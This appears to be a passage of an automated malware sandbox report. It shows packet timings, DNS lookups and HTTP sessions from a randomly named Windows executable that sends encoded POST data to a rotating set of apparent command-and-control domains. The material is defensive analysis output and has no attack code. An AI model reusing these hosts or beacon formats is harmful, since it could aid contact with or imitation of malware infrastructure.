                                          Sep 7, 2024 21:44:49.013950109 CEST8056245162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:49.013963938 CEST8056245162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:49.014005899 CEST5624580192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:49.014542103 CEST8056245162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:49.014559984 CEST8056245162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:49.014571905 CEST8056245162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:49.014585018 CEST5624580192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:49.014662027 CEST5624580192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:49.015485048 CEST8056245162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:49.015496969 CEST8056245162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:49.015506983 CEST8056245162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:49.015517950 CEST8056245162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:49.015528917 CEST5624580192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:49.015562057 CEST5624580192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:49.019195080 CEST8056245162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:49.019305944 CEST8056245162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:49.019315958 CEST8056245162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:49.019344091 CEST5624580192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:49.066839933 CEST5624580192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:49.111784935 CEST8056245162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:49.111843109 CEST8056245162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:49.111855984 CEST8056245162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:49.111934900 CEST5624580192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:49.111985922 CEST5624580192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:49.115000010 CEST5624580192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:49.123816013 CEST8056245162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:54.572721004 CEST5624680192.168.2.43.33.130.190
                                          Sep 7, 2024 21:44:54.578438044 CEST80562463.33.130.190192.168.2.4
                                          Sep 7, 2024 21:44:54.578507900 CEST5624680192.168.2.43.33.130.190
                                          Sep 7, 2024 21:44:54.592462063 CEST5624680192.168.2.43.33.130.190
                                          Sep 7, 2024 21:44:54.597279072 CEST80562463.33.130.190192.168.2.4
                                          Sep 7, 2024 21:44:55.044585943 CEST80562463.33.130.190192.168.2.4
                                          Sep 7, 2024 21:44:55.044637918 CEST5624680192.168.2.43.33.130.190
                                          Sep 7, 2024 21:44:56.098162889 CEST5624680192.168.2.43.33.130.190
                                          Sep 7, 2024 21:44:56.231839895 CEST80562463.33.130.190192.168.2.4
                                          Sep 7, 2024 21:44:57.117883921 CEST5624780192.168.2.43.33.130.190
                                          Sep 7, 2024 21:44:57.122817039 CEST80562473.33.130.190192.168.2.4
                                          Sep 7, 2024 21:44:57.122920036 CEST5624780192.168.2.43.33.130.190
                                          Sep 7, 2024 21:44:57.134924889 CEST5624780192.168.2.43.33.130.190
                                          Sep 7, 2024 21:44:57.145575047 CEST80562473.33.130.190192.168.2.4
                                          Sep 7, 2024 21:44:57.590646982 CEST80562473.33.130.190192.168.2.4
                                          Sep 7, 2024 21:44:57.590728998 CEST5624780192.168.2.43.33.130.190
                                          Sep 7, 2024 21:44:58.646505117 CEST5624780192.168.2.43.33.130.190
                                          Sep 7, 2024 21:44:58.651482105 CEST80562473.33.130.190192.168.2.4
                                          Sep 7, 2024 21:44:59.664417982 CEST5624880192.168.2.43.33.130.190
                                          Sep 7, 2024 21:44:59.669449091 CEST80562483.33.130.190192.168.2.4
                                          Sep 7, 2024 21:44:59.672514915 CEST5624880192.168.2.43.33.130.190
                                          Sep 7, 2024 21:44:59.685391903 CEST5624880192.168.2.43.33.130.190
                                          Sep 7, 2024 21:44:59.694586992 CEST80562483.33.130.190192.168.2.4
                                          Sep 7, 2024 21:44:59.694642067 CEST80562483.33.130.190192.168.2.4
                                          Sep 7, 2024 21:44:59.694818974 CEST80562483.33.130.190192.168.2.4
                                          Sep 7, 2024 21:44:59.694828987 CEST80562483.33.130.190192.168.2.4
                                          Sep 7, 2024 21:44:59.694941998 CEST80562483.33.130.190192.168.2.4
                                          Sep 7, 2024 21:44:59.694984913 CEST80562483.33.130.190192.168.2.4
                                          Sep 7, 2024 21:44:59.694993973 CEST80562483.33.130.190192.168.2.4
                                          Sep 7, 2024 21:44:59.695075989 CEST80562483.33.130.190192.168.2.4
                                          Sep 7, 2024 21:44:59.695085049 CEST80562483.33.130.190192.168.2.4
                                          Sep 7, 2024 21:45:00.152508974 CEST80562483.33.130.190192.168.2.4
                                          Sep 7, 2024 21:45:00.152606010 CEST5624880192.168.2.43.33.130.190
                                          Sep 7, 2024 21:45:01.191931963 CEST5624880192.168.2.43.33.130.190
                                          Sep 7, 2024 21:45:01.381431103 CEST80562483.33.130.190192.168.2.4
                                          Sep 7, 2024 21:45:02.218880892 CEST5624980192.168.2.43.33.130.190
                                          Sep 7, 2024 21:45:02.223886013 CEST80562493.33.130.190192.168.2.4
                                          Sep 7, 2024 21:45:02.223943949 CEST5624980192.168.2.43.33.130.190
                                          Sep 7, 2024 21:45:02.232033014 CEST5624980192.168.2.43.33.130.190
                                          Sep 7, 2024 21:45:02.236979961 CEST80562493.33.130.190192.168.2.4
                                          Sep 7, 2024 21:45:02.701323986 CEST80562493.33.130.190192.168.2.4
                                          Sep 7, 2024 21:45:02.701483011 CEST80562493.33.130.190192.168.2.4
                                          Sep 7, 2024 21:45:02.701524973 CEST5624980192.168.2.43.33.130.190
                                          Sep 7, 2024 21:45:02.704840899 CEST5624980192.168.2.43.33.130.190
                                          Sep 7, 2024 21:45:02.709640980 CEST80562493.33.130.190192.168.2.4
                                          Sep 7, 2024 21:45:07.736212015 CEST5625080192.168.2.413.248.169.48
                                          Sep 7, 2024 21:45:07.742007017 CEST805625013.248.169.48192.168.2.4
                                          Sep 7, 2024 21:45:07.744184971 CEST5625080192.168.2.413.248.169.48
                                          Sep 7, 2024 21:45:07.755774021 CEST5625080192.168.2.413.248.169.48
                                          Sep 7, 2024 21:45:07.760617018 CEST805625013.248.169.48192.168.2.4
                                          Sep 7, 2024 21:45:08.211986065 CEST805625013.248.169.48192.168.2.4
                                          Sep 7, 2024 21:45:08.215627909 CEST5625080192.168.2.413.248.169.48
                                          Sep 7, 2024 21:45:09.270061970 CEST5625080192.168.2.413.248.169.48
                                          Sep 7, 2024 21:45:09.275088072 CEST805625013.248.169.48192.168.2.4
                                          Sep 7, 2024 21:45:10.314930916 CEST5625180192.168.2.413.248.169.48
                                          Sep 7, 2024 21:45:10.769083023 CEST805625113.248.169.48192.168.2.4
                                          Sep 7, 2024 21:45:10.769172907 CEST5625180192.168.2.413.248.169.48
                                          Sep 7, 2024 21:45:10.784368992 CEST5625180192.168.2.413.248.169.48
                                          Sep 7, 2024 21:45:10.790328979 CEST805625113.248.169.48192.168.2.4
                                          Sep 7, 2024 21:45:11.255019903 CEST805625113.248.169.48192.168.2.4
                                          Sep 7, 2024 21:45:11.261504889 CEST5625180192.168.2.413.248.169.48
                                          Sep 7, 2024 21:45:12.286094904 CEST5625180192.168.2.413.248.169.48
                                          Sep 7, 2024 21:45:12.291547060 CEST805625113.248.169.48192.168.2.4
                                          Sep 7, 2024 21:45:13.304512024 CEST5625280192.168.2.413.248.169.48
                                          Sep 7, 2024 21:45:13.800905943 CEST805625213.248.169.48192.168.2.4
                                          Sep 7, 2024 21:45:13.801053047 CEST5625280192.168.2.413.248.169.48
                                          Sep 7, 2024 21:45:13.815429926 CEST5625280192.168.2.413.248.169.48
                                          Sep 7, 2024 21:45:13.820259094 CEST805625213.248.169.48192.168.2.4
                                          Sep 7, 2024 21:45:13.820298910 CEST805625213.248.169.48192.168.2.4
                                          Sep 7, 2024 21:45:13.820348024 CEST805625213.248.169.48192.168.2.4
                                          Sep 7, 2024 21:45:13.820358992 CEST805625213.248.169.48192.168.2.4
                                          Sep 7, 2024 21:45:13.820369005 CEST805625213.248.169.48192.168.2.4
                                          Sep 7, 2024 21:45:13.820379019 CEST805625213.248.169.48192.168.2.4
                                          Sep 7, 2024 21:45:13.820388079 CEST805625213.248.169.48192.168.2.4
                                          Sep 7, 2024 21:45:13.820478916 CEST805625213.248.169.48192.168.2.4
                                          Sep 7, 2024 21:45:13.820497990 CEST805625213.248.169.48192.168.2.4
                                          Sep 7, 2024 21:45:14.263609886 CEST805625213.248.169.48192.168.2.4
                                          Sep 7, 2024 21:45:14.263668060 CEST5625280192.168.2.413.248.169.48
                                          Sep 7, 2024 21:45:15.316963911 CEST5625280192.168.2.413.248.169.48
                                          Sep 7, 2024 21:45:15.321780920 CEST805625213.248.169.48192.168.2.4
                                          Sep 7, 2024 21:45:16.338041067 CEST5625380192.168.2.413.248.169.48
                                          Sep 7, 2024 21:45:16.342912912 CEST805625313.248.169.48192.168.2.4
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Sep 7, 2024 21:43:34.204176903 CEST | 192.168.2.4 | 1.1.1.1 | 0x75af | Standard query (0) | www.nosr.net | A (IP address) | IN (0x0001) | false |
| Sep 7, 2024 21:43:35.191869974 CEST | 192.168.2.4 | 1.1.1.1 | 0x75af | Standard query (0) | www.nosr.net | A (IP address) | IN (0x0001) | false |
| Sep 7, 2024 21:43:51.273336887 CEST | 192.168.2.4 | 1.1.1.1 | 0x65f4 | Standard query (0) | www.monos.shop | A (IP address) | IN (0x0001) | false |
| Sep 7, 2024 21:43:59.351669073 CEST | 192.168.2.4 | 1.1.1.1 | 0xa4d7 | Standard query (0) | www.complexity.pub | A (IP address) | IN (0x0001) | false |
| Sep 7, 2024 21:44:12.716047049 CEST | 192.168.2.4 | 1.1.1.1 | 0x21ec | Standard query (0) | www.nevsehir-nakliyat.xyz | A (IP address) | IN (0x0001) | false |
| Sep 7, 2024 21:44:26.273284912 CEST | 192.168.2.4 | 1.1.1.1 | 0xf5 | Standard query (0) | www.masteriocp.online | A (IP address) | IN (0x0001) | false |
| Sep 7, 2024 21:44:40.290380955 CEST | 192.168.2.4 | 1.1.1.1 | 0xb825 | Standard query (0) | www.kryto.top | A (IP address) | IN (0x0001) | false |
| Sep 7, 2024 21:44:54.135387897 CEST | 192.168.2.4 | 1.1.1.1 | 0xd8af | Standard query (0) | www.angelenterprise.biz | A (IP address) | IN (0x0001) | false |
| Sep 7, 2024 21:45:07.717387915 CEST | 192.168.2.4 | 1.1.1.1 | 0x8313 | Standard query (0) | www.dyme.tech | A (IP address) | IN (0x0001) | false |
| Sep 7, 2024 21:45:21.821394920 CEST | 192.168.2.4 | 1.1.1.1 | 0xe999 | Standard query (0) | www.lilibetmed.online | A (IP address) | IN (0x0001) | false |
| Sep 7, 2024 21:45:22.817466021 CEST | 192.168.2.4 | 1.1.1.1 | 0xe999 | Standard query (0) | www.lilibetmed.online | A (IP address) | IN (0x0001) | false |
| Sep 7, 2024 21:45:36.277404070 CEST | 192.168.2.4 | 1.1.1.1 | 0x72c5 | Standard query (0) | www.mbwd.store | A (IP address) | IN (0x0001) | false |
| Sep 7, 2024 21:45:51.461513996 CEST | 192.168.2.4 | 1.1.1.1 | 0x343d | Standard query (0) | www.terrearcenciel.online | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Sep 7, 2024 21:43:35.532731056 CEST | 1.1.1.1 | 192.168.2.4 | 0x75af | No error (0) | www.nosr.net | nosr.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Sep 7, 2024 21:43:35.532731056 CEST | 1.1.1.1 | 192.168.2.4 | 0x75af | No error (0) | nosr.net | | 82.221.128.183 | A (IP address) | IN (0x0001) | false |
| Sep 7, 2024 21:43:35.532759905 CEST | 1.1.1.1 | 192.168.2.4 | 0x75af | No error (0) | www.nosr.net | nosr.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Sep 7, 2024 21:43:35.532759905 CEST | 1.1.1.1 | 192.168.2.4 | 0x75af | No error (0) | nosr.net | | 82.221.128.183 | A (IP address) | IN (0x0001) | false |
| Sep 7, 2024 21:43:51.286057949 CEST | 1.1.1.1 | 192.168.2.4 | 0x65f4 | Name error (3) | www.monos.shop | none | none | A (IP address) | IN (0x0001) | false |
| Sep 7, 2024 21:43:59.371408939 CEST | 1.1.1.1 | 192.168.2.4 | 0xa4d7 | No error (0) | www.complexity.pub | | 217.160.0.127 | A (IP address) | IN (0x0001) | false |
| Sep 7, 2024 21:44:12.905616045 CEST | 1.1.1.1 | 192.168.2.4 | 0x21ec | No error (0) | www.nevsehir-nakliyat.xyz | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Sep 7, 2024 21:44:12.905616045 CEST | 1.1.1.1 | 192.168.2.4 | 0x21ec | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Sep 7, 2024 21:44:12.905616045 CEST | 1.1.1.1 | 192.168.2.4 | 0x21ec | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false |
| Sep 7, 2024 21:44:26.705341101 CEST | 1.1.1.1 | 192.168.2.4 | 0xf5 | No error (0) | www.masteriocp.online | dns.ladipage.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Sep 7, 2024 21:44:26.705341101 CEST | 1.1.1.1 | 192.168.2.4 | 0xf5 | No error (0) | dns.ladipage.com | | 18.139.62.226 | A (IP address) | IN (0x0001) | false |
| Sep 7, 2024 21:44:26.705341101 CEST | 1.1.1.1 | 192.168.2.4 | 0xf5 | No error (0) | dns.ladipage.com | | 54.179.173.60 | A (IP address) | IN (0x0001) | false |
| Sep 7, 2024 21:44:26.705341101 CEST | 1.1.1.1 | 192.168.2.4 | 0xf5 | No error (0) | dns.ladipage.com | | 13.228.81.39 | A (IP address) | IN (0x0001) | false |
| Sep 7, 2024 21:44:40.740897894 CEST | 1.1.1.1 | 192.168.2.4 | 0xb825 | No error (0) | www.kryto.top | | 162.0.213.94 | A (IP address) | IN (0x0001) | false |
| Sep 7, 2024 21:44:54.569549084 CEST | 1.1.1.1 | 192.168.2.4 | 0xd8af | No error (0) | www.angelenterprise.biz | angelenterprise.biz | | CNAME (Canonical name) | IN (0x0001) | false |
| Sep 7, 2024 21:44:54.569549084 CEST | 1.1.1.1 | 192.168.2.4 | 0xd8af | No error (0) | angelenterprise.biz | | 3.33.130.190 | A (IP address) | IN (0x0001) | false |
| Sep 7, 2024 21:44:54.569549084 CEST | 1.1.1.1 | 192.168.2.4 | 0xd8af | No error (0) | angelenterprise.biz | | 15.197.148.33 | A (IP address) | IN (0x0001) | false |
| Sep 7, 2024 21:45:07.731180906 CEST | 1.1.1.1 | 192.168.2.4 | 0x8313 | No error (0) | www.dyme.tech | | 13.248.169.48 | A (IP address) | IN (0x0001) | false |
| Sep 7, 2024 21:45:07.731180906 CEST | 1.1.1.1 | 192.168.2.4 | 0x8313 | No error (0) | www.dyme.tech | | 76.223.54.146 | A (IP address) | IN (0x0001) | false |
| Sep 7, 2024 21:45:22.843759060 CEST | 1.1.1.1 | 192.168.2.4 | 0xe999 | No error (0) | www.lilibetmed.online | | 185.134.245.113 | A (IP address) | IN (0x0001) | false |
| Sep 7, 2024 21:45:22.847618103 CEST | 1.1.1.1 | 192.168.2.4 | 0xe999 | No error (0) | www.lilibetmed.online | | 185.134.245.113 | A (IP address) | IN (0x0001) | false |
| Sep 7, 2024 21:45:36.593625069 CEST | 1.1.1.1 | 192.168.2.4 | 0x72c5 | No error (0) | www.mbwd.store | | 103.42.108.46 | A (IP address) | IN (0x0001) | false |
| Sep 7, 2024 21:45:51.473531961 CEST | 1.1.1.1 | 192.168.2.4 | 0x343d | Name error (3) | www.terrearcenciel.online | none | none | A (IP address) | IN (0x0001) | false |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.4 | 56228 | 82.221.128.183 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe |

Timestamp | Bytes transferred | Direction | Data
Sep 7, 2024 21:43:35.553037882 CEST | 497 | OUT | GET /ujbu/?GtLD=xFGdQ6FH&dxWljT6=MTTknThtRCJj0AT/2nqFymBldeCJp6XfOmsto+GOgM7INhQU0fKKD5oUBTZzolSVFZTYJ8HdpMRBL7zARboLl6MWH88cVp441dEYiiIl3QDYLx1FQH1mC88= HTTP/1.1
                                          Host: www.nosr.net
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.5
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
Sep 7, 2024 21:43:36.228411913 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                          Date: Sat, 07 Sep 2024 19:43:32 GMT
                                          Server: Apache
                                          Accept-Ranges: bytes
                                          Cache-Control: no-cache, no-store, must-revalidate
                                          Pragma: no-cache
                                          Expires: 0
                                          Connection: close
                                          Transfer-Encoding: chunked
                                          Content-Type: text/html


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.4 | 56230 | 217.160.0.127 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe |

Timestamp | Bytes transferred | Direction | Data
Sep 7, 2024 21:43:59.388808012 CEST | 773 | OUT | POST /4c7j/ HTTP/1.1
                                          Host: www.complexity.pub
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 204
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.complexity.pub
                                          Referer: http://www.complexity.pub/4c7j/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Ascii: dxWljT6=spsn588TGAkFnw0A1ShisnvoVnVg82U064U1F5eZFAGuDxxSlClTHZao5lciH9JTIiovdrmdwUy1lGll80q720ZhpMaoiPkP1NHsA9XBKbCvqY/xxF3IQhN7+ZEdsBQ+8+lyAz5qEDJOsHr8JRfcRpPO33hnNRI5DLAwRfxamczqaKQdo/L6s1l6XYuWqiSkMA==
Sep 7, 2024 21:44:00.021413088 CEST | 558 | IN | HTTP/1.1 404 Not Found
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Date: Sat, 07 Sep 2024 19:43:59 GMT
                                          Server: Apache
                                          Content-Encoding: gzip


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          2 | 192.168.2.4 | 56231 | 217.160.0.127 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:44:01.931091070 CEST | 793 | OUT | POST /4c7j/ HTTP/1.1
                                          Host: www.complexity.pub
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 224
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.complexity.pub
                                          Referer: http://www.complexity.pub/4c7j/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Ascii: dxWljT6=spsn588TGAkFmQkA319iknvrQnVglmUw64I1F4qJE0quDQBSkGJTGZaozFcjJdIdIikRduOdwU21lG1l8HS63kZjhsamtvkP1NHsA9rrKbqvqsDxyk3PZBN625EdmhQy8+lAA35QEA9OsFz8Hk/fIZPUongsKBJqEqw4RtpphtWPfMBH5Oqt+1BJKfninhvtXNtqg2B7Hgfbud0bUqJSA/M=
                                          Sep 7, 2024 21:44:02.596792936 CEST | 558 | IN | HTTP/1.1 404 Not Found
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Date: Sat, 07 Sep 2024 19:44:02 GMT
                                          Server: Apache
                                          Content-Encoding: gzip


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          3 | 192.168.2.4 | 56232 | 217.160.0.127 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:44:04.477689981 CEST | 10875 | OUT | POST /4c7j/ HTTP/1.1
                                          Host: www.complexity.pub
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 10304
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.complexity.pub
                                          Referer: http://www.complexity.pub/4c7j/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Ascii: dxWljT6= [TRUNCATED]
                                          Sep 7, 2024 21:44:05.120832920 CEST | 558 | IN | HTTP/1.1 404 Not Found
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Date: Sat, 07 Sep 2024 19:44:05 GMT
                                          Server: Apache
                                          Content-Encoding: gzip


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          4 | 192.168.2.4 | 56233 | 217.160.0.127 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:44:07.019808054 CEST | 503 | OUT | GET /4c7j/?dxWljT6=hrEH6McWLCF5pgA15gNtwiWGYg9JkAgLu443cuDXEGm/YRJcjH1mUpiczm8APdsMFHQVN63ktGuGy3xZxkW75lpPuubSjdIy5/XyCdXWUNnJg8HZvEzqXDM=&GtLD=xFGdQ6FH HTTP/1.1
                                          Host: www.complexity.pub
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.5
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Sep 7, 2024 21:44:07.694381952 CEST | 745 | IN | HTTP/1.1 404 Not Found
                                          Content-Type: text/html
                                          Content-Length: 601
                                          Connection: close
                                          Date: Sat, 07 Sep 2024 19:44:07 GMT
                                          Server: Apache
                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          5 | 192.168.2.4 | 56234 | 85.159.66.93 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:44:12.932871103 CEST | 794 | OUT | POST /csz1/ HTTP/1.1
                                          Host: www.nevsehir-nakliyat.xyz
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 204
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.nevsehir-nakliyat.xyz
                                          Referer: http://www.nevsehir-nakliyat.xyz/csz1/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Ascii: dxWljT6=M3XIOEl8pWS+OGNU/snwK3MHHtxDnd7Jvzir5VT3W2I1OCYxZeB0gqSHAQff0ofgykuUCwzgB1fkCweELC+ZBPVO+UEWouy+05NHTufDD7Wk+73Pnxs9JE1uMPO0y8E30dTuafnzfJ5sDRZs0IbjOVISoj/sfnSBkTZtv/wD4fy3Ncbzk8pLrjnojefcxnLdOA==
                                          Sep 7, 2024 21:44:13.634608984 CEST | 225 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx/1.14.1
                                          Date: Sat, 07 Sep 2024 19:44:13 GMT
                                          Content-Length: 0
                                          Connection: close
                                          X-Rate-Limit-Limit: 5s
                                          X-Rate-Limit-Remaining: 19
                                          X-Rate-Limit-Reset: 2024-09-07T19:44:18.5264901Z


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          6 | 192.168.2.4 | 56235 | 85.159.66.93 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:44:15.486314058 CEST | 814 | OUT | POST /csz1/ HTTP/1.1
                                          Host: www.nevsehir-nakliyat.xyz
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 224
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.nevsehir-nakliyat.xyz
                                          Referer: http://www.nevsehir-nakliyat.xyz/csz1/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Ascii: dxWljT6=M3XIOEl8pWS+OmdU5PPwMXMELNxDyt7Fvzer5UXnWl81JiIxafB0tKSHLwfa6IesykThCy3gB17kCxOELxGYAfVMx0EUmOy+05NHTubpD9+k+KHPmQs+Dk1vNPO028Ez0dTYaa/VfLRsDTBs0ZbkFVIQmD+5XVfXphUwp/0l1diLIaKp1NIc5jDb+ZWo8k2UVHbMEU4ke/r4nGQbaXFeM3M=
                                          Sep 7, 2024 21:44:16.177949905 CEST | 225 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx/1.14.1
                                          Date: Sat, 07 Sep 2024 19:44:16 GMT
                                          Content-Length: 0
                                          Connection: close
                                          X-Rate-Limit-Limit: 5s
                                          X-Rate-Limit-Remaining: 18
                                          X-Rate-Limit-Reset: 2024-09-07T19:44:18.5264901Z


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          7 | 192.168.2.4 | 56236 | 85.159.66.93 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:44:18.030464888 CEST | 10896 | OUT | POST /csz1/ HTTP/1.1
                                          Host: www.nevsehir-nakliyat.xyz
